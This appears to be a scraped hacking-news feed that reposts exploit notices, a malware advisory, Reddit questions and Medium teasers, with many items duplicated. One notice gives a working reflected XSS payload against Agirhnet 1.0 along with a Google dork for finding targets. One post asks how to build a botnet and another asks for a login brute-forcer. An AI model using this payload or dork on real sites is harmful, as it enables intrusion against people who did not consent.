Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Agirhnet 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Agirhnet version 1.0 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Agirhnet 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Agirhnet version 1.0 suffers from a cross site scripting vulnerability.
MD5 |
ef6c4205e2f5214c1f0d90bd7a8a0a2fDownload
# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//
vulnerable Parameter : FORM
Payload: /%22%0Aconfirm(document.domain)//
it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Agirhnet 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Dsocks.10 Hardcoded Password
https://1.bp.blogspot.com/-HfAgGXf1DOw/WWlvbMysVAI/AAAAAAAAIPI/FubFag34U7YDsw4ZG5KiakYQR-P9HSuiwCLcBGAs/s1600/h72.png
Backdoor.Win32.Dsocks.10 malware suffers from a hardcoded cleartext password vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Dsocks.10 Hardcoded Password
https://1.bp.blogspot.com/-HfAgGXf1DOw/WWlvbMysVAI/AAAAAAAAIPI/FubFag34U7YDsw4ZG5KiakYQR-P9HSuiwCLcBGAs/s1600/h72.png
Backdoor.Win32.Dsocks.10 malware suffers from a hardcoded cleartext password vulnerability.
MD5 |
7146a3c64c1589283679178640135a9fDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/3a505e7ea1beee556860488e34db8da6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Dsocks.10
Vulnerability: Hardcoded Cleartext Password
Description: The malware Coded by Drocon builds and creates backdoor servers, the supplied password is then hardcoded in cleartext in the PE file.
Type: PE32
MD5: 3a505e7ea1beee556860488e34db8da6
Vuln ID: MVID-2022-0496
Dropped files: server.exe
Disclosure: 02/21/2022
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Dsocks.10 Hardcoded Password
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Getting a Penetration Testing Job
https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/
___________________________
@hacking_Attack
@Hacking_Video
reddit
Getting a Penetration Testing Job
Posted in r/Pentesting by u/Hackermansam • 1 point and 0 comments
submitted by /u/Hackermansam (https://www.reddit.com/user/Hackermansam)
[link] (https://robertscocca.medium.com/getting-a-penetration-testing-job-cbe662d8444d) [comments] (https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/)
___________________________
@hacking_Attack
@Hacking_Video
[link] (https://robertscocca.medium.com/getting-a-penetration-testing-job-cbe662d8444d) [comments] (https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
overview for Hackermansam
The u/Hackermansam community on Reddit. Reddit gives you the best of the internet in one place.
hacking: security in practice
Building a BOTNET windows driver manipulation
Hey guys, I'm kinda lost looking for an advice.
I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful proposes only for my own personal knowledge, and it seems like a complex and fun project to make.
I have bought the following book to gain basic knowledge of what I should be looking at: https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
I started reading and realized I don't have enough basic knowledge in-order to understand that book. I was trying to figure out what I'm missing, I came across Kernel drivers programing using C/C++,
My question is if it is the missing piece? I have good knowledge of C, C++ and Assembly x86, but not yet knowledge of operating systems and windows especially.
I would love a recommendation for a book or topics I should be researching in-order to gain good comprehension of windows drivers manipulations.
submitted by /u/Pig443
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Building a BOTNET windows driver manipulation
Hey guys, I'm kinda lost looking for an advice.
I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful proposes only for my own personal knowledge, and it seems like a complex and fun project to make.
I have bought the following book to gain basic knowledge of what I should be looking at: https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
I started reading and realized I don't have enough basic knowledge in-order to understand that book. I was trying to figure out what I'm missing, I came across Kernel drivers programing using C/C++,
My question is if it is the missing piece? I have good knowledge of C, C++ and Assembly x86, but not yet knowledge of operating systems and windows especially.
I would love a recommendation for a book or topics I should be researching in-order to gain good comprehension of windows drivers manipulations.
submitted by /u/Pig443
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Building a BOTNET windows driver manipulation
Hey guys, I'm kinda lost looking for an advice. I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful...
hacking: security in practice
This is my first time here, is there a good program for figuring out the password and username of an account on a website?
Maybe something that brute forces it but ideally something a bit more sophisticated. I am doing this on my own website, just to be clear.
submitted by /u/Worth_Talk_817
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
This is my first time here, is there a good program for figuring out the password and username of an account on a website?
Maybe something that brute forces it but ideally something a bit more sophisticated. I am doing this on my own website, just to be clear.
submitted by /u/Worth_Talk_817
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
This is my first time here, is there a good program for figuring...
Maybe something that brute forces it but ideally something a bit more sophisticated.
Operation Cache Pandas
https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934) [comments] (https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934) [comments] (https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Operation Cache Pandas
Posted in r/redteamsec by u/dmchell • 1 point and 0 comments
Hacking on Medium
Servidores de base de datos Microsoft SQL vulnerables sin parches
https://cdn-images-1.medium.com/max/1539/0*cu6830q5_QQsB0gJ
PUBLICADO EN 22 FEBRERO, 2022 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Servidores de base de datos Microsoft SQL vulnerables sin parches
https://cdn-images-1.medium.com/max/1539/0*cu6830q5_QQsB0gJ
PUBLICADO EN 22 FEBRERO, 2022 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Servidores de base de datos Microsoft SQL vulnerables sin parches
PUBLICADO EN 22 FEBRERO, 2022 POR EHACKING
Hacking on Medium
Getting a Penetration Testing Job
https://cdn-images-1.medium.com/max/1280/0*5kkaP7Cq59_qPgyf.jpg
Only 1 year IT experience and fresh out of college, this is my story of how I became a penetration tester. About all the jobs, courses…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Getting a Penetration Testing Job
https://cdn-images-1.medium.com/max/1280/0*5kkaP7Cq59_qPgyf.jpg
Only 1 year IT experience and fresh out of college, this is my story of how I became a penetration tester. About all the jobs, courses…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Getting a Penetration Testing Job
Only 1 year IT experience and fresh out of college, this is my story of how I became a penetration tester. About all the jobs, courses…
Hacking on Medium
We Still haven’t Figured Out Cyber — Here’s What’s Coming Next
https://cdn-images-1.medium.com/max/600/0*K9nItktDqdBHEEep
I’ve been in the security game for 20 years and I can tell you two concrete facts: 1) the security world is constantly evolving and 2) it…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
We Still haven’t Figured Out Cyber — Here’s What’s Coming Next
https://cdn-images-1.medium.com/max/600/0*K9nItktDqdBHEEep
I’ve been in the security game for 20 years and I can tell you two concrete facts: 1) the security world is constantly evolving and 2) it…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
We Still haven’t Figured Out Cyber — Here’s What’s Coming Next
I’ve been in the security game for 20 years and I can tell you two concrete facts: 1) the security world is constantly evolving and 2) it…
Hacking on Medium
OSINTGRAM
https://cdn-images-1.medium.com/max/800/1*VFJFsGdGUTj1Yl7GRCTMPQ.jpeg
What is osintgram ?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
OSINTGRAM
https://cdn-images-1.medium.com/max/800/1*VFJFsGdGUTj1Yl7GRCTMPQ.jpeg
What is osintgram ?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
OSINTGRAM
What is osintgram ?
Hacking on Medium
Identity of Alleged Ethereum 2016 DAO Hacker Revealed in New Book
https://cdn-images-1.medium.com/max/1800/1*xkVNu8VvH7eAuDw3n08hPQ.png
A recently published study claims to have identified the hacker who compromised The DAO on Ethereum in 2016. In a Forbes article published…
Continue reading on Coinmonks »
___________________________
@hacking_Attack
@Hacking_Video
Identity of Alleged Ethereum 2016 DAO Hacker Revealed in New Book
https://cdn-images-1.medium.com/max/1800/1*xkVNu8VvH7eAuDw3n08hPQ.png
A recently published study claims to have identified the hacker who compromised The DAO on Ethereum in 2016. In a Forbes article published…
Continue reading on Coinmonks »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Identity of Alleged Ethereum 2016 DAO Hacker Revealed in New Book
A recently published study claims to have identified the hacker who compromised The DAO on Ethereum in 2016. In a Forbes article published…
Hacking on Medium
Lodge Letter #32: Of Hacks, Rugs & Scams
https://cdn-images-1.medium.com/max/960/0*9RC75ZC61-ry3peS
In which we consider the hierarchy of theft into crypto. Plus: Elk protocol and partnership news in advance of ElkNet v.2
Continue reading on Elk Finance »
___________________________
@hacking_Attack
@Hacking_Video
Lodge Letter #32: Of Hacks, Rugs & Scams
https://cdn-images-1.medium.com/max/960/0*9RC75ZC61-ry3peS
In which we consider the hierarchy of theft into crypto. Plus: Elk protocol and partnership news in advance of ElkNet v.2
Continue reading on Elk Finance »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Lodge Letter #32: Of Hacks, Rugs & Scams
In which we consider the hierarchy of theft into crypto. Plus: Elk protocol and partnership news in advance of ElkNet v.2
Hacking on Medium
Paper HackTheBox Write-Up
https://cdn-images-1.medium.com/max/600/0*S4sCQQ5baROFqVgX.jpg
Easy box made by Jin
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Paper HackTheBox Write-Up
https://cdn-images-1.medium.com/max/600/0*S4sCQQ5baROFqVgX.jpg
Easy box made by Jin
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Paper HackTheBox Write-Up
Easy box made by Jin
Hacking on Medium
Atacantes pueden bloquear los dispositivos de seguridad de correo electrónico de Cisco mediante el…
https://cdn-images-1.medium.com/max/1531/0*CaPwZPdPQJszuSt4
PUBLICADO EN 22 FEBRERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Atacantes pueden bloquear los dispositivos de seguridad de correo electrónico de Cisco mediante el…
https://cdn-images-1.medium.com/max/1531/0*CaPwZPdPQJszuSt4
PUBLICADO EN 22 FEBRERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Atacantes pueden bloquear los dispositivos de seguridad de correo electrónico de Cisco mediante el…
PUBLICADO EN 22 FEBRERO, 2022POR EHACKING
Paper HackTheBox Write-Up
https://0xjin.medium.com/paper-hackthebox-write-up-2abca22d3b54?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://0xjin.medium.com/paper-hackthebox-write-up-2abca22d3b54?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Paper HackTheBox Write-Up
Easy box made by Jin